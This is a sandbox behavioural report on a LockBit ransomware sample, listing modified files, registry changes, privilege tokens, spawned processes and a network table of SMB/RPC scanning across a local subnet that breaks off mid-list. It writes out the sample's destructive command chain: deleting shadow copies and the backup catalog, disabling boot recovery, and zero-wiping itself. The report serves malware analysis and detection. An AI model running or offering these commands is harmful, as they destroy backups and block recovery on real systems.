| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
Network
| Country | Destination | Proto | Domain |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.0:445 | | tcp |
| N/A | 10.127.1.31:445 | | tcp |
| N/A | 10.127.1.10:445 | | tcp |
| N/A | 10.127.1.54:445 | | tcp |
| N/A | 10.127.1.15:445 | | tcp |
| N/A | 10.127.1.32:445 | | tcp |
| N/A | 10.127.1.17:445 | | tcp |
| N/A | 10.127.1.34:445 | | tcp |
| N/A | 10.127.1.43:445 | | tcp |
| N/A | 10.127.1.18:445 | | tcp |
| N/A | 10.127.1.62:445 | | tcp |
| N/A | 10.127.1.26:445 | | tcp |
| N/A | 10.127.1.30:445 | | tcp |
| N/A | 10.127.1.48:445 | | tcp |
| N/A | 10.127.1.55:445 | | tcp |
| N/A | 10.127.1.52:445 | | tcp |
| N/A | 10.127.1.23:445 | | tcp |
| N/A | 10.127.1.51:445 | | tcp |
| N/A | 10.127.1.39:445 | | tcp |
| N/A | 10.127.1.44:445 | | tcp |
| N/A | 10.127.1.38:445 | | tcp |
| N/A | 10.127.1.16:445 | | tcp |
| N/A | 10.127.1.36:445 | | tcp |
| N/A | 10.127.1.13:445 | | tcp |
| N/A | 10.127.1.28:445 | | tcp |
| N/A | 10.127.1.22:445 | | tcp |
| N/A | 10.127.1.12:445 | | tcp |
| N/A | 10.127.1.7:445 | | tcp |
| N/A | 10.127.1.4:445 | | tcp |
| N/A | 10.127.1.25:445 | | tcp |
| N/A | 10.127.1.27:445 | | tcp |
| N/A | 10.127.1.40:445 | | tcp |
| N/A | 10.127.1.9:445 | | tcp |
| N/A | 10.127.1.58:445 | | tcp |
| N/A | 10.127.1.11:445 | | tcp |
| N/A | 10.127.1.50:445 | | tcp |
| N/A | 10.127.1.41:445 | | tcp |
| N/A | 10.127.1.21:445 | | tcp |
| N/A | 10.127.1.19:445 | | tcp |
| N/A | 10.127.1.20:445 | | tcp |
| N/A | 10.127.1.37:445 | | tcp |
| N/A | 10.127.1.42:445 | | tcp |
| N/A | 10.127.1.6:445 | | tcp |
| N/A | 10.127.1.1:445 | | tcp |
| N/A | 10.127.1.29:445 | | tcp |
| N/A | 10.127.1.14:445 | | tcp |
| N/A | 10.127.1.35:445 | | tcp |
| N/A | 10.127.1.8:445 | | tcp |
| N/A | 10.127.1.254:135 | | tcp |
| N/A | 10.127.1.243:135 | | tcp |
| N/A | 10.127.1.234:135 | | tcp |
| N/A | 10.127.1.235:135 | | tcp |
| N/A | 10.127.1.237:135 | | tcp |
| N/A | 10.127.1.236:135 | | tcp |
| N/A | 10.127.1.240:135 | | tcp |
| N/A | 10.127.1.238:135 | | tcp |
| N/A | 10.127.1.241:135 | | tcp |
| N/A | 10.127.1.239:135 | | tcp |
| N/A | 10.127.1.229:135 | | tcp |
| N/A | 10.127.1.230:135 | | tcp |
| N/A | 10.127.1.231:135 | | tcp |
| N/A | 10.127.1.232:135 | | tcp |
| N/A | 10.127.1.233:135 | | tcp |
| N/A | 10.127.1.245:135 | | tcp |
| N/A | 10.127.1.246:135 | | tcp |
| N/A | 10.127.1.253:135 | | tcp |
| N/A | 10.127.1.244:135 | | tcp |
| N/A | 10.127.1.247:135 | | tcp |
| N/A | 10.127.1.242:135 | | tcp |
| N/A | 10.127.1.249:135 | | tcp |
| N/A | 10.127.1.250:135 | | tcp |
| N/A | 10.127.1.251:135 | | tcp |
| N/A | 10.127.1.248:135 | | tcp |
| N/A | 10.127.1.252:135 | | tcp |
| N/A | 10.127.1.199:135 | | tcp |
| N/A | 10.127.1.210:135 | | tcp |
| N/A | 10.127.1.211:135 | | tcp |
| N/A | 10.127.1.200:135 | | tcp |
| N/A | 10.127.1.212:135 | | tcp |
| N/A | 10.127.1.213:135 | | tcp |
| N/A | 10.127.1.214:135 | | tcp |
| N/A | 10.127.1.215:135 | | tcp |
| N/A | 10.127.1.216:135 | | tcp |
| N/A | 10.127.1.217:135 | | tcp |
| N/A | 10.127.1.218:135 | | tcp |
| N/A | 10.127.1.219:135 | | tcp |
| N/A | 10.127.1.201:135 | | tcp |
| N/A | 10.127.1.202:135 | | tcp |
| N/A | 10.127.1.203:135 | | tcp |
| N/A | 10.127.1.204:135 | | tcp |
| N/A | 10.127.1.205:135 | | tcp |
| N/A | 10.127.1.209:135 | | tcp |
| N/A | 10.127.1.227:135 | | tcp |
| N/A | 10.127.1.228:135 | | tcp |
| N/A | 10.127.1.220:135 | | tcp |
| N/A | 10.127.1.221:135 | | tcp |
| N/A | 10.127.1.222:135 | | tcp |
| N/A | 10.127.1.223:135 | | tcp |
| N/A | 10.127.1.224:135 | | tcp |
| N/A | 10.127.1.225:135 | | tcp |
| N/A | 10.127.1.206:135 | | tcp |
| N/A | 10.127.1.188:135 | | tcp |
| N/A | 10.127.1.189:135 | | tcp |
| N/A | 10.127.1.193:135 | | tcp |
| N/A | 10.127.1.194:135 | | tcp |
| N/A | 10.127.1.195:135 | | tcp |
| N/A | 10.127.1.196:135 | | tcp |
| N/A | 10.127.1.197:135 | | tcp |
| N/A | 10.127.1.198:135 | | tcp |
| N/A | 10.127.1.184:135 | | tcp |
| N/A | 10.127.1.190:135 | | tcp |
| N/A | 10.127.1.186:135 | | tcp |
| N/A | 10.127.1.191:135 | | tcp |
| N/A | 10.127.1.192:135 | | tcp |
| N/A | 10.127.1.207:135 | | tcp |
| N/A | 10.127.1.208:135 | | tcp |
| N/A | 10.127.1.182:135 | | tcp |
| N/A | 10.127.1.226:135 | | tcp |
| N/A | 10.127.1.185:135 | | tcp |
| N/A | 10.127.1.187:135 | | tcp |
| N/A | 10.127.1.181:135 | | tcp |
| N/A | 10.127.1.183:135 | | tcp |
| N/A | 10.127.1.180:135 | | tcp |
| N/A | 10.127.1.179:135 | | tcp |
| N/A | 10.127.1.177:135 | | tcp |
| N/A | 10.127.1.172:135 | | tcp |
| N/A | 10.127.1.178:135 | | tcp |
| N/A | 10.127.1.171:135 | | tcp |
| N/A | 10.127.1.176:135 | | tcp |
| N/A | 10.127.1.175:135 | | tcp |
| N/A | 10.127.1.174:135 | | tcp |
| N/A | 10.127.1.173:135 | | tcp |
| N/A | 10.127.1.168:135 | | tcp |
| N/A | 10.127.1.170:135 | | tcp |
| N/A | 10.127.1.169:135 | | tcp |
| N/A | 10.127.1.166:135 | | tcp |
| N/A | 10.127.1.165:135 | | tcp |
| N/A | 10.127.1.164:135 | | tcp |
| N/A | 10.127.1.163:135 | | tcp |
| N/A | 10.127.1.162:135 | | tcp |
| N/A | 10.127.1.167:135 | | tcp |
| N/A | 10.127.1.161:135 | | tcp |
| N/A | 10.127.1.160:135 | | tcp |
| N/A | 10.127.1.159:135 | | tcp |
| N/A | 10.127.1.158:135 | | tcp |
| N/A | 10.127.1.157:135 | | tcp |
| N/A | 10.127.1.156:135 | | tcp |
| N/A | 10.127.1.155:135 | | tcp |
| N/A | 10.127.1.154:135 | | tcp |
| N/A | 10.127.1.143:135 | | tcp |
| N/A | 10.127.1.142:135 | | tcp |
| N/A | 10.127.1.141:135 | | tcp |
| N/A | 10.127.1.140:135 | | tcp |
| N/A | 10.127.1.139:135 | | tcp |
| N/A | 10.127.1.137:135 | | tcp |
| N/A | 10.127.1.118:135 | | tcp |
| N/A | 10.127.1.153:135 | | tcp |
| N/A | 10.127.1.123:135 | | tcp |
| N/A | 10.127.1.124:135 | | tcp |
